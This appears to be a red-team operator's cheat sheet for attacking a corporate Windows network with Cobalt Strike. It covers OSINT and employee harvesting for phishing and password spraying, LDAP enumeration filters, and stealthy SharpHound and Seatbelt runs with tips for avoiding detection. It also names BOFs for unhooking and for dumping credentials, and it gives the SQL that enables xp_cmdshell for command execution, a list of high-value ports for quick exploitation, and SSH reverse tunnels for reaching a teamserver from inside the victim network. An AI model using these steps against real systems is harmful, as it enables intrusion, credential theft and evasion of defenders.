Not a definitive list, cheatsheet, or opsec safe by any means, just things of note....

Several enumeration techniques are picked up by defenses (including sharphound collectors), especially LDAP queries with asteriks like attribute=*. Iterative lookups are usually better, if you know what I mean.

• TrustedSec's Situational Awareness BOFs
• ajpc500's BOFs
• Raphael Mudge's Unhook BOF
• EncodeGroup's SAM - SYSTEM - SECURITY Dump BOF
• rookuu's MiniDumpWriteDump BOF

All assemblies should be run through BOF.NET.

In Beacon terminal:

1. bofnet_init
2. bofent_load /Path/To/Assembly.exe
3. bofnet_executeassembly ASSEMBLYNAME -arg1 VALUE -arg2 VALUE

1. OSINT (Passive)
   • Whois company, what do they do or specialize in
   • Find out what the company atmosphere is like (use company review sites like Glassdoor)
   • ASN Lookups
   • DNS Recon (amass, subfinder, crt.sh,certspotter DNS Zone transfers, etc), including MX/SPF etc
   • Shodan
   • Company email format (first.last, flast, etc -> find on hunter.io)
   • Code repository recon (github, gitlab, bitbucket, etc) using truffleHog, git-secrets, etc
   • Perform AWS bucket and/or Azure blob enumeration using tools such as MicroBurst and inSp3ctor.
   • Harvest employee names (use theHarvester and/or Linky with keyword searches) and curate list with company email format
     • (Used for phishing and/or password spraying)
2. (Active)
   • Nmap IPs/Domains for list of systems online and any open ports
   • Take note of any management ports externally accessible
   • Identify any web apps (Eyewitness/Aquatone)
     • (Especially employee login portals to perform a password spray)
   • Inspect web apps for comments or files hosted in amazon, azure, etc.
   • Perform discovery of documents across live domains to extract MetaData from (PowerMeta, FOCA)

Get all active (not disabled) Users

(&(objectCategory=person)(objectClass=user)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))

Get all active (not disabled) Computers

(&(objectCategory=Computer)(!userAccountControl:1.2.840.113556.1.4.803:=2))

Get all Groups

(&(objectClass=group))

Get all Domain Admins

(&(objectCategory=group)(name=Domain Admins))

Get accounts with SPN set

(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))

Get specific User

(&(objectCategory=person)(objectClass=user)(samaccountname=TARGETUSERNAME))

Get specific Computer

(&(objectCategory=Computer)(name=TARGETCOMPUTERNAME))

Get Domain Controllers

(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))

Get Password Policy

(&(objectClass=msDS-PasswordSettings))

Get Users with passnotreq set

(&(objectCategory=Person)(objectClass=User)(userAccountControl:1.2.840.113556.1.4.803:=32))

All users with Password Never Expires set

(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))

Others:

https://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx

bofnet_load /path/to/Seatbelt.exe

bofnet_executeassembly Seatbelt -group=user

bofnet_executeassembly Seatbelt -group=system

bofnet_executeassembly Seatbelt -group=all -full

bofnet_load /path/to/sharphound.exe

Run the following methods one at a time, mix up the order as desired:

bofnet_executeassembly Sharphound --CollectionMethod Group --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames

bofnet_executeassembly Sharphound --CollectionMethod Trusts --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames

bofnet_executeassembly Sharphound --CollectionMethod ACL --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames

bofnet_executeassembly Sharphound --CollectionMethod ObjectProps --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames

bofnet_executeassembly Sharphound --CollectionMethod Container --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames

bofnet_executeassembly Sharphound --CollectionMethod GPOLocalGroup --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames

If stuck and need to do Session and Localadmin collection, target specific systems of interest:

bofnet_executeassembly Sharphound --CollectionMethod Session,LocalAdmin --Domain TARGETDOMAIN --ComputerFile c:\path\to\target\systems.list --Jitter 20 --Throttle 2000 --NoSaveCache --RandomizeFilenames

Hunt for sensitive files, scripts, and plaintext credentials in accessible shares. Speed it up by using this amazing tool: Snaffler by l0ss.

MoveKit and the required two assemplies: SharpRDP + SharpMove.

Use the Service binpath modifcation technique (SCShell by Mr-Un1k0d3r)

Check if xp_cmdshell is enabled

SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name = 'xp_cmdshell';

Enable advanced options

EXEC('sp_configure ''show advanced options'', 1; reconfigure;');

Enable xp_cmdshell

EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;');

RCE

exec master.sys.xp_cmdshell 'whoami'

HVT ports for some quick wins on discovered subnets (mostly when on an internal network)

• Java RMI: 1090,1098,1099,4444,11099,47001,47002,10999
• WebLogic: 7001-7004, 8000-8003,9000-9003,9503,7070,7071
• JDWP: 45000,45001
• JMX: 8686,9012,50500
• GlassFish: 4848
• jBoss: 11111,4444,4445
• Cisco Smart Install: 4786
• HP Data Protector: 5555,5556
• Apache Solr: 8983,8984

Backup CobaltStrike Logs

rsync -avzh -e "ssh -i /path/to/private.ky" root@TEAMSERVER:/path/to/cobaltstrike/logs/ /path/to/local/destination/folder

Create a tunnel at externally accessible middlebox and back to Kali. Run from Kali (on someones internal network maybe):

ssh root@middlebox -R 2022:localhost:22

Run on middlebox:

ssh root@localhost -p 2022

run on Kali:

ssh root@middlebox -R 2022:localhost:22

Run on your local system at home sitting behind firewall:

ssh -t root@middlebox -L 2023:localhost:2022 ssh -p 2022 root@localhost

BONUS: Access CobaltStrike or any other service running on Kali by running this on your local machine:

ssh -L 50050:localhost:50050 -p2023 root@localhost